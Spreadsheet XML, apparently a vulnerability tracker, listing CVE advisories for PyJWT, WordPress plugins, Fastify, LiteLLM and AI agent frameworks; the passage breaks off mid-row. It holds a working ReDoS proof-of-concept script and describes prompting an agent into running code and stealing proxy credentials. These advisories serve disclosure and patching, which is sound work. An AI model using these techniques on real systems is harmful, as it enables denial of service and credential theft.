Historical testing reproduced the confirmed payload behavior in all 20 official supported PyJWT 2.x releases from 2.0.0a1 through 2.14.0, inclusive. Unsupported PyJWT 1.7.1 also reproduces the behavior, but it is excluded from the advisory range under the supported-2.x policy. No supported unaffected release and no patched release exists. The exact evidence is `/Users/jpadilla/.codex/security-advisories/pyjwt/GHSA-42vr-xj54-vc7v-historical-range-20260922.md` (SHA-256 `c48f1ac35641e9382d53e6a879a71ad9a8fb4432bbe871f2b8330f8d166a2d81`) and `/Users/jpadilla/.codex/security-advisories/pyjwt/historical-range-42vr-20260922/historical-range-results.json` (SHA-256 `324997f231561bf6da39b8f9d1e272f69bfde8871a7863f5cb7b70e22e91f076`). The evidence-backed supported affected range is `&gt;= 2.0.0a1, &lt;= 2.14.0`.
Historical range verification is complete. A local fix commit exists and has passed independent review and the complete local CI suite, but it has not been merged into `master` or released. Consequently, `patched_versions` remains empty and this advisory remains in `triage`. The remaining next step is a maintainer decision on remediation and merge. After a fix lands in `master` and is released, `patched_versions` and advisory lifecycle can be updated in a separate approved batch.
---
## Maintainer remediation update (2026-09-23)
The confirmed payload-parser finding has been fixed on `master`. Commit
`5fde08a6cf906aa7698de2d6391d88b73006b17b` converts a recursive
payload parse failure to the expected `DecodeError`; commit
`9bc06658f875b9b40091539140bbbdc4639161c3` makes the regression tests
deterministic across supported Python versions. This update supersedes the
2026-09-22 remediation-status statement that the fix had not landed.
The original pre-verification payload reproducer and the
`PyJWKClient.get_signing_key_from_jwt` path were covered by regression tests.
The exact landed tree passed the full 39-environment local tox matrix and
GitHub CI for commit `9bc06658f875b9b40091539140bbbdc4639161c3` passed
all 25 jobs, including Ubuntu Python 3.14 and 3.15. The demonstrated impact
remains an uncaught request-level exception in affected releases; there is
still no evidence of process termination, persistent resource exhaustion,
authentication bypass, or confidentiality or integrity impact.
The supported affected range remains `&gt;= 2.0.0a1, &lt;= 2.14.0`. The latest
released version is 2.14.0, which predates these commits; no released
patched version exists yet, so `patched_versions` remains unset. CVSS v3.1
5.3 (Medium) and CWE-248 remain unchanged. The advisory may now move from
triage to private draft. The next lifecycle step is a new supported 2.x
release containing the fix, followed by separately approved patched-version
and publication updates after release verification.
---
## Maintainer release update (2026-09-23)
PyJWT 2.15.0 is the first released version containing the payload-parser fix. Its GitHub release tag points to commit `1d41a6478e1562e68ff667fcd703356acf085f68`, which includes fix commit `5fde08a6cf906aa7698de2d6391d88b73006b17b` and deterministic regression-test commit `9bc06658f875b9b40091539140bbbdc4639161c3`. PyPI published both the wheel and source distribution from that release commit through the successful production workflow at https://github.com/jpadilla/pyjwt/actions/runs/35891602963.
The published PyPI wheel (`pyjwt-2.15.0-py3-none-any.whl`, SHA-256 `7a3742debf6b879e912dbb9819ceec1594be812452b78c5f2e2dfc56564954f8`) was checked directly: the deeply nested unsigned payload now raises `DecodeError`, while an ordinary unsigned payload still decodes. The supported affected range remains `&gt;= 2.0.0a1, &lt;= 2.14.0`; the patched version is `2.15.0`. Earlier statements in this advisory that no released patched version exists are superseded by this update.
The confirmed impact remains an uncaught request-level exception in affected versions, not a demonstrated process crash or authentication bypass. The separate JWKS-response subclaim remains outside this advisory's confirmed PyJWT-owned scope.</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101918</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102270</t>
        </is>
      </c>
      <c r="D189" s="5" t="inlineStr"/>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr">
        <is>
          <t>PyPI:pyjwt</t>
        </is>
      </c>
      <c r="M189" s="5" t="inlineStr">
        <is>
          <t>2.14.0</t>
        </is>
      </c>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr"/>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>### Summary
There is a Re-DoS vulnerability in the `is_pem_format` function which results in a intesive CPU usage if an attacker is been able to provide a custom certificate.
### Details
The problem is that the lazy quantifier `.+?` will always first try to match as little as possible until it finds a `---- END`. Normally this means the complexity of this should be O(N). However, by providing an input which consists only of `----BEGIN CERTIFICATE-----` lines and no `---- END` line, the regex algorithm will first try to match the first line and then, with the lazy quantifier, all the lines until the end O(N), which then fails since it is unable to find a `---- END` line. It will then jump to the next line, resulting in N re-scans of the whole string, which means the complexity basically results in O(N²). 
### PoC
```python
import time
import re
BEGIN_LINE = b"-----BEGIN CERTIFICATE-----\n"
_PEMS = {
    b"CERTIFICATE",
    b"TRUSTED CERTIFICATE",
    b"PRIVATE KEY",
    b"PUBLIC KEY",
    b"ENCRYPTED PRIVATE KEY",
    b"OPENSSH PRIVATE KEY",
    b"DSA PRIVATE KEY",
    b"RSA PRIVATE KEY",
    b"RSA PUBLIC KEY",
    b"EC PRIVATE KEY",
    b"DH PARAMETERS",
    b"NEW CERTIFICATE REQUEST",
    b"CERTIFICATE REQUEST",
    b"SSH2 PUBLIC KEY",
    b"SSH2 ENCRYPTED PRIVATE KEY",
    b"X509 CRL",
}
_PEM_RE = re.compile(
    b"----[- ]BEGIN ("
    + b"|".join(_PEMS)
    + b""")[- ]----\r?
.+?\r?
----[- ]END \\1[- ]----\r?\n?""",
    re.DOTALL,
)
def is_pem_format(key: bytes) -&gt; bool:
    return bool(_PEM_RE.search(key))
def make_payload(num_headers: int) -&gt; bytes:
    return BEGIN_LINE * num_headers
def measure(num_headers: int) -&gt; float:
    payload = make_payload(num_headers)
    start = time.perf_counter()
    is_pem_format(payload)  # returns False, but burns CPU getting there
    elapsed = time.perf_counter() - start
    print(
        f"  headers={num_headers:&gt;4}  size={len(payload)//1024:&gt;3} KB"
        f"   time={elapsed*1000:&gt;7.1f} ms"
    )
    return elapsed
for n in (1000, 2000, 4000, 8000):
    measure(n)
```
### Impact
The attacker could use extensive resources, which could make the resource (e.g. a web server) unavailable.
### Maintainer update (2026-09-10): 
We reproduced the reported quadratic regex behavior on malformed PEM-like input: doubling repeated BEGIN lines produced approximately fourfold runtime growth, while equal-sized ordinary input remained negligible. The affected path is reached when an application passes attacker-controlled key or certificate bytes to PyJWT’s key preparation, and the impact is resource exhaustion. The fix is on master in commit 8b4e233a22206b34ec1186e912e75c0b2396ac07; it replaces the backtracking PEM regex with a bounded marker scan. Fresh Astra/max review accepted the fix and confirmed malformed, mixed-label, and valid-input controls. This is a distinct ReDoS finding from the later PEM-recognition report that shares the implementation commit. The fix has not yet shipped in a released PyJWT 2.x version, so this advisory is being moved to draft and remains unpublished pending release.
## Maintainer update — 2026-09-11
The verified fix for this advisory is included in PyJWT 2.14.0, released on 2026-09-11 and available on PyPI. PyJWT 2.14.0 is the first release containing the fix. This advisory is now published with the release recorded as the patched version.</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102270</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19253</t>
        </is>
      </c>
      <c r="D190" s="5" t="inlineStr"/>
      <c r="E190" s="5" t="inlineStr"/>
      <c r="F190" s="5" t="inlineStr"/>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="inlineStr"/>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr"/>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>The Cache Enabler WordPress plugin before 1.8.17 does not validate a URL before using it to build a filesystem path in its cache purge routine, and does not confine the resulting deletion to the cache directory, allowing unauthenticated users to delete arbitrary files and directories on sites where another installed Cache Enabler WordPress plugin before 1.8.17 or  passes a request-derived URL to its public cache-clearing hook.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19253</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51852</t>
        </is>
      </c>
      <c r="D191" s="5" t="inlineStr"/>
      <c r="E191" s="5" t="inlineStr"/>
      <c r="F191" s="5" t="inlineStr"/>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="inlineStr"/>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr"/>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>agent-zero 1.7, 1.8, 1.9, and 1.10 is vulnerable to Directory Traversal in python/helpers/file_browser.py:FileBrowser.save_file_b64. The save_file_b64 method accepts user-controlled file paths without normalization or validation, allowing path traversal attacks.</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51852</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51853</t>
        </is>
      </c>
      <c r="D192" s="5" t="inlineStr"/>
      <c r="E192" s="5" t="inlineStr"/>
      <c r="F192" s="5" t="inlineStr"/>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="inlineStr"/>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr"/>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>agent-zero 1.7, 1.8, 1.9, and 1.10 is vulnerable to Directory Traversal in python/helpers/file_browser.py:FileBrowser.__init__. The FileBrowser class initializes with the host root directory as the workspace, allowing the agent to access any file on the system without restriction.</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51853</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51856</t>
        </is>
      </c>
      <c r="D193" s="5" t="inlineStr"/>
      <c r="E193" s="5" t="inlineStr"/>
      <c r="F193" s="5" t="inlineStr"/>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="inlineStr"/>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr"/>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>In agentscope 1.0.18, 1.0.19, and 1.0.19 when the RealtimeAgent session exposes execute_python_code as an available tool, a remote WebSocket user can prompt the agent to call that tool and run Python code in the service environment. In the validated path, RealtimeAgent._acting forwards the model-produced tool call to Toolkit.call_tool_function, which invokes execute_python_code without an additional approval or isolation boundary on that path.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51856</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51857</t>
        </is>
      </c>
      <c r="D194" s="5" t="inlineStr"/>
      <c r="E194" s="5" t="inlineStr"/>
      <c r="F194" s="5" t="inlineStr"/>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr"/>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>In camel-ai camel 0.2.91a1, v0.2.91a2 and v0.2.91a3, CodeExecutionToolkit can run model-produced Python code through SubprocessInterpreter without an approval boundary.</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51857</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51864</t>
        </is>
      </c>
      <c r="D195" s="5" t="inlineStr"/>
      <c r="E195" s="5" t="inlineStr"/>
      <c r="F195" s="5" t="inlineStr"/>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr"/>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>DB-GPT v0.7.5 and v0.8.0 contains directory traversal in python_file_upload (packages/dbgpt-app/src/dbgpt_app/openapi/api_v1/python_upload_api.py:42). A remote attacker can use the validated exploitation path to write files outside the intended workspace or storage boundary.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51864</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51866</t>
        </is>
      </c>
      <c r="D196" s="5" t="inlineStr"/>
      <c r="E196" s="5" t="inlineStr"/>
      <c r="F196" s="5" t="inlineStr"/>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr">
        <is>
          <t>react</t>
        </is>
      </c>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr"/>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>In DB-GPT 0.7.5 and 0.8.0, a skill uploaded through the real /api/v1/skills/upload route can later be executed through the real /api/v1/chat/react-agent flow.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51866</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76169</t>
        </is>
      </c>
      <c r="D197" s="5" t="inlineStr"/>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M197" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr"/>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify routes a malformed URL under one plugin prefix to the custom not-found handler of a different sibling plugin, invoking the handler registered last and skipping the `preHandler` declared in its `setNotFoundHandler()`. When the request method has no route in the main router, a malformed request target reaches Fastify's internal not-found router before URL decoding and is dispatched through a single shared handler pointer, regardless of prefix and without the normal request lifecycle. An unauthenticated request to a public prefix can therefore reach an authentication-protected not-found handler registered under a different prefix and receive its full response, breaking prefix encapsulation and bypassing the authentication hook. Applications whose private or tenant fallbacks return protected data from a not-found handler are affected.
### Patches
Patched in fastify 5.12.2. Malformed URLs are now routed through the configured `onBadUrl` and `onMaxParamLength` handlers so they fail closed before any application not-found handler runs, and the shared not-found handler pointer has been removed.
### Workarounds
Reject malformed request targets before they reach the application, for example at an upstream proxy or gateway, and do not rely on a not-found handler to serve protected data. A global `onRequest` authentication hook does not mitigate this, because the malformed-URL path skips it.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76169</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80490</t>
        </is>
      </c>
      <c r="D198" s="5" t="inlineStr"/>
      <c r="E198" s="5" t="inlineStr"/>
      <c r="F198" s="5" t="inlineStr"/>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t>Algorithm::AhoCorasick::XS versions through 0.04 for Perl read the haystack string length before the scalar is stringified.
The matches, first_match and match_details methods use the T_STD_STRING typemap to translate Perl scalars (SVs) into strings via the std::string constructor, using the SvPV macro to stringify the haystack input, and the SvCUR macro to determine the length of the SV.
When the input SVs are references, integers (IVs) or floats (NVs), the SvCUR macro will return an invalid length if it is run before the input is stringified, leading to an out-of-bounds read which can abort the process.
Note that the evaluation order of arguments to std::string is unspecified. Depending on the compiler, SvCUR may be run first and lead to an abort that cannot be caught within Perl.
This can be triggered when the haystack is a numeric value, for example,
    my $ac = Algorithm::AhoCorasick::XS-&gt;new( [ "11", "22" ] );
    $ac-&gt;matches( 211 );
This can occur when the haystack is the result of reading data from decoded JSON or a numeric database column. It can also be triggered when using a blessed object as a haystack.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80490</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81739</t>
        </is>
      </c>
      <c r="D199" s="5" t="inlineStr"/>
      <c r="E199" s="5" t="inlineStr"/>
      <c r="F199" s="5" t="inlineStr"/>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr"/>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>The Paytm Payment Gateway WordPress plugin before 2.8.9 does not sanitize and escape data it stores from payment callbacks before outputting it in an admin page, and the integrity check on those callbacks can be forged when the gateway is enabled without credentials, allowing unauthenticated users to store scripts that will run in the session of a store administrator.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81739</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81809</t>
        </is>
      </c>
      <c r="D200" s="5" t="inlineStr"/>
      <c r="E200" s="5" t="inlineStr"/>
      <c r="F200" s="5" t="inlineStr"/>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr"/>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>The Paytm Payment Gateway WordPress plugin before 2.8.9 does not properly escape data taken from payment callbacks before using it in a SQL statement, and the integrity check on those callbacks can be forged when the gateway is enabled without credentials, allowing unauthenticated users to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81809</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84377</t>
        </is>
      </c>
      <c r="D201" s="5" t="inlineStr"/>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr">
        <is>
          <t>PyPI:litellm</t>
        </is>
      </c>
      <c r="M201" s="5" t="inlineStr">
        <is>
          <t>1.88.6, 1.89.7, 1.90.7, 1.91.5, 1.92.2, 1.93.2</t>
        </is>
      </c>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr"/>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>### Impact
Any authenticated LiteLLM proxy user could redirect an outbound provider call to a destination they control and cause the proxy to send its own configured provider credentials to that destination. The proxy's request-body validation was a denylist that did not cover every sensitive parameter and did not inspect parameters nested inside other request fields, so a caller could supply a routing or credential value that the proxy applied without clearing the operator's stored key. Any authenticated user could therefore exfiltrate the operator's upstream provider credentials and other configured secrets, and perform Server-Side Request Forgery against internal services reachable from the proxy.
### Patches
